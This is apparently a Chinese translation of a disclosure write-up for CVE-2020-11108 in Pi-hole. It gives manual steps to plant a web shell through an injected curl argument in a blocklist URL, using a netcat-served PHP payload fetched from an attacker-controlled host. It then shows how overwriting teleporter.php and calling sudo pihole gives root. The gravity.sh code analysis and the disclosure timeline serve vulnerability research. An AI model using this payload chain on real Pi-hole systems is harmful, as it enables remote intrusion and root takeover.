原文地址:https://frichetten.com/blog/cve-2020-11108-pihole-rce/

以下是CVE-2020-11108的writeup,Pi-hole Web应用程序的认证用户可以通过CVE-2020-11108漏洞实现远程代码执行并提权为root。此漏洞影响Pi-hole v4.4及更低版本。这是我使用多年的一个开源项目中,一个令人兴奋的发现。

所有漏洞都是通过手动代码审计发现。请注意,技术上来讲有两条路径可以获取远程代码执行,但是它们是相似的,并且依赖于同一个易受攻击的函数调用。

这篇文章分为两部分,第一部分简要概述如何利用这些漏洞,第二部分是漏洞的发现和技术分析。

完整的PoC利用在这里

Manual Steps to Exploit

可靠的RCE:此漏洞利用方式不依赖任何特殊条件,只需要通过应用程序的身份验证,并且在默认安装的Pi-hole中有效。

步骤1:打开"Settings > Blocklists"

步骤2:禁用当前所有的拦截列表(加快速度),然后输入以下payload作为新URL。
http://192.168.122.1#" -o fun.php -d "
其中的IP地址是您所控制的地址。请注意,是必需的,并且-d之后的空格也是必需的。输入后点击保存。

步骤3:使用netcat监听80端口(可以修改payload以支持其他端口,但是更改后对':'字符的一些后端解析更令人烦恼,不值得更改)

步骤4:点击"Save and Update"

步骤5:几秒钟后,将会收到一个GET请求。返回一个200响应(这是必需的),按下回车,输入任意内容(只是为了提供一些数据),再按两次回车,然后Ctrl+c。

步骤6:再使用netcat监听80端口,然后点击"Update"再次更新Gravity。这次应该会在响应中看到“.domains”,这表明到目前为止都正确完成了漏洞利用。按下回车,然后粘贴你想用的任意PHP payload。调用Shell函数非常好用,然后Ctrl+c kill掉netcat。

步骤7:如果你用的payload是一个反弹shell,请设置监听器。然后curl /admin/scripts/pi-hole/php/fun.php。这将触发payload。恭喜,你刚刚已在Pi-hole上实现了RCE!

有条件的RCE:为了利用此漏洞,除了要通过Web应用程序认证之外,Pi-hole服务还必须将其BLOCKINGMODE配置设置为NXDOMAIN。将在技术分析中对此进行详细说明。

步骤1:打开“Settings > Blocklists”

步骤2:禁用当前所有的拦截列表(加快速度),然后输入以下payload作为新URL。
http://192.168.122.1#" -o fun.php -d "
其中IP地址是您所控制的地址。请注意,是必需的,并且-d之后的空格也是必需的。输入后单击保存。

步骤3:使用netcat监听80端口(可以修改payload支持其他端口,但是更改后对':'字符的一些后端解析更令人烦恼,不值得更改)

步骤4:点击“Save and Update”

步骤5:几秒钟后,你将会收到一个包含':80:'的GET请求。这表明BLOCKINGMODE已设置为NXDOMAIN,并且已成功利用该漏洞。按下回车,然后粘贴你想用的任意PHP payload。调用Shell函数非常好用,然后Ctrl+c kill掉netcat。

步骤6:如果你用的payload是一个反弹shell,请设置监听器。然后curl /admin/scripts/pi-hole/php/fun.php。这将触发payload。恭喜,你刚刚已在Pi-hole上实现了RCE!

权限提升:在获得一个shell后,你可以通过以下方式提升权限。

步骤1:重新执行上述任意一个漏洞利用方式,这次将覆盖teleporter.php(而不是写入fun.php)。
http://192.168.122.1#" -o teleporter.php -d "

步骤2:使用之前获得的shell,运行sudo pihole -a -t(www-data有一个sudo规则来调用pihole),该命令将以root身份调用teleporter.php。如果你已经使用反弹Shell payload(如上面的例子)将其覆盖,那么你将获得root权限。

Discovery

最初的发现纯属偶然。在之前的文章中,我介绍了如何对Python执行反序列化攻击。作为后续,我想在PHP应用程序中复制这一点。在写那篇文章时(我发誓它终将到来!),我开始研究我在家庭网络上运行的一些使用 PHP 的应用程序。

经过反复挑选后,我最终选择了Pi-hole实例。如果你以前从未用过,Pi-hole是一个专用的DNS服务器,设备可以使用它来拦截广告和恶意域名。有了它,你可以轻松地在整个网络范围内屏蔽广告,而不必依赖浏览器插件之类的东西。

我开始查看代码,寻找实施反序列化攻击的机会,但最终非常失望(没有一个可以利用的反序列化函数)。我的下一个想法是寻找机会利用phar stream wrappers。在仔细查看app时,我注意到可以使用用户选择的拦截列表(Settings > Blocklists)。

我测试了一个phar stream wrapper,似乎可以利用(剧透警告:不能)。

看到这一点后,我心想:“好吧,我们可以定义协议(例如,http vs https)。我敢打赌后端的PHP会向这些域名发出GET请求,提取内容,然后添加到拦截列表中。我想知道它是否会处理这种phar stream wrapper?”。

我拉取了程序源代码,很惊讶地发现情况并非如此。相反,PHP实际上调用pihole CLI工具来更新拦截列表。然后我查看了代码库,并在gravity.sh中发现了gravity_DownloadBlocklistFromUrl函数。

在执行这个函数时,我发现实际的下载是通过curl完成的。

这就是所有乐趣的开始。您会注意到,有很多变量会受到影响。

Technical Analysis

为了追踪利用路径,我们需要检查这些参数并理解curl如何解析它们。下面是我们应该研究的内容的简化格式(从利用的角度)。
curl ${cmd_ext} ${heisenbergCompensator} "${url}" -o "${patternBuffer}"

你可能会发现的第一件事是cmd_ext和heisenbergCompensator没有用引号引起来,这为我们提供了将参数注入curl的机会。如果你曾经利用过类似的东西(讽刺的是,我有过在curl请求中滥用参数的经历),那么有两个特别有用的参数:-o输出,-x代理。

为了使事情对我们更有利,curl命令将以root身份运行,意味着我们可以在任何地方写入文件(稍后详细介绍)。由于此脚本由PHP在Web目录中调用,因此任何用-o编写的文件都将写入Web目录中。如果我们可以控制参数和内容,那么就可以确保远程代码执行。另一件事是,Curl将优先考虑参数的输入顺序,首先输入的参数将会先被执行。因此curl -o a -o b https://frichetten.com将会把输出写入到a中。

这使得我们仔细研究了没有用引号引起来的两个参数,最终也有两种注入方式。

首先,我们来看看heisenbergCompensator。如果saveLocation变量是一个有效文件,那么会在gravity.sh的第238行设置heisenbergCompensator。如果它是有效/可读的,那么saveLocation变量将用于构造heisenbergCompensator。这是在上一个函数(gravity_SetDownloadOptions)中设置的,并且是由多个变量构造的。
saveLocation="${piholeDir}/list.${i}.${domain}.${domainsExtension}"

因为我们控制了输入,所以我们可以能够创建带有空格和其他参数的域名。这应该不会对文件名造成问题,并且这些空格可以使我们向curl命令注入自己的参数。为了利用这个,我们使用了以下payload。
http://192.168.122.1#" -o fun.php -d "

这个域名被解析时双引号将被提取。因此,在curl时,变量是这样的,heisenbergCompensator = -z /etc/pihole/list.0.192.168.122.1# -o fun.php -d .domains

现在,正如您回顾的那样,heisenbergCompensator变量是在验证文件是否存在之后设置。对我们而言,好消息是,更新一次gravity就足以写入下图所示的文件。

唯一要注意的是,我们必须以200 OK进行响应,以确保文件被写入。根据第290行,这是必须的。

-d参数用来处理附加的额外数据。第二次更新Gravity时,curl请求将包含注入的参数并将我们的payload写入Web目录。

你可能想知道是否可以利用这个漏洞来覆盖SSH配置、/etc/shadow或其他文件。不幸的是,我没有找到方法来写入除Web目录之外的其他任何目录。作为后端解析的一部分,所有“/”字符都被正则表达式过滤掉。我花了不少时间来尝试解决此问题,但是没有成功(如果你找到方法,请告诉我)。

这就解决了 heisenberg compentator 的问题,那么cmd_ext呢?坏消息是,仅当BLOCKINGMODE设置为NXDOMAIN时才设置此参数。尽管这是有效的配置,并且由开发人员支持,但它不是Pi-hole附带的默认配置。

但是,如果设置了它,利用方式实际上比上一个方法更容易。cmd_ext在第274行定义,构造如下。
cmd_ext="--resolve $domain:$port:$ip"

因此,我们可以使用之前构造的payload作为域名。引入的空格将使我们能够注入参数,并且使用-d参数来处理用于解析的其余数据(特别是':80:')。

Escalating Privileges

两种RCE都能达到相同的效果,即得到以www-data用户身份运行的Pi-hole主机上的shell。 从这里开始,我们要提升权限。与开发人员交谈后,他们提到了一种先前公开的权限提升方法,与某些Bash trickery有关。这是一个非常聪明的方法,但是我真的很想找到自己的方式。

如果你只是看了Pi-hole Web应用程序的源代码,你可能会惊讶地发现它定期调用sudo pihole。这是否意味着www-data是没有密码的sudo用户?不,对我们来说很不幸,事实并非如此。但是,www-data确实有一个sudo规则来运行pihole命令!

这感觉像是 CTF 中的一个提示,显然我必须使用pihole脚本本身来进行权限提升。你应该知道的一点是,它实际上是一个Bash脚本,它调用/opt/pihole中的其他Bash脚本。所有都属于root用户,因此很遗憾,我们不能修改其中一个脚本,然后使用sudo运行它。

在浏览这些脚本时,我注意到了一些同样不错的东西。在/opt/pihole/webpage.sh中,在第547行,脚本调用了Web目录中的PHP文件。

从这里开始游戏变得简单,我们可以重复之前的漏洞利用,这次覆盖了teleporter.php。 然后,当我们运行sudo pihole -a -t,它调用在teleporter.php和viola中的payload,然后我们就获得了root权限!

总体而言,这是一次很棒的hacking,我希望我能够解释出它为什么很棒,哪怕只有10%。其中大部分都归结为寻找能够满足后端要求的边缘案例(这个payload迭代了很多轮,直到它生效。最初的版本是使用大括号)。

非常感谢Pi-hole核心团队,感谢他们支持我探索不同的选择以及不断扩展最初的利用方式!

Disclosure Timeline

2020年3月29日:联系Pi-hole团队
2020年3月29日:Pi-hole核心团队确认了该报告
2020年3月30日:与团队会面,提供更多信息/跟踪问题
2020年3月30日:Mitre分配了CVE-2020-11108
2020年3月31日:通过heisenbergCompensator发现第二种RCE方法
2020年4月2日:发现并提交权限提升bug
2020年5月10日:Pi-hole团队允许我分享bug和PoC

点击收藏 | 0 关注 | 1
  • 动动手指,沙发就是你的了!
登录 后跟帖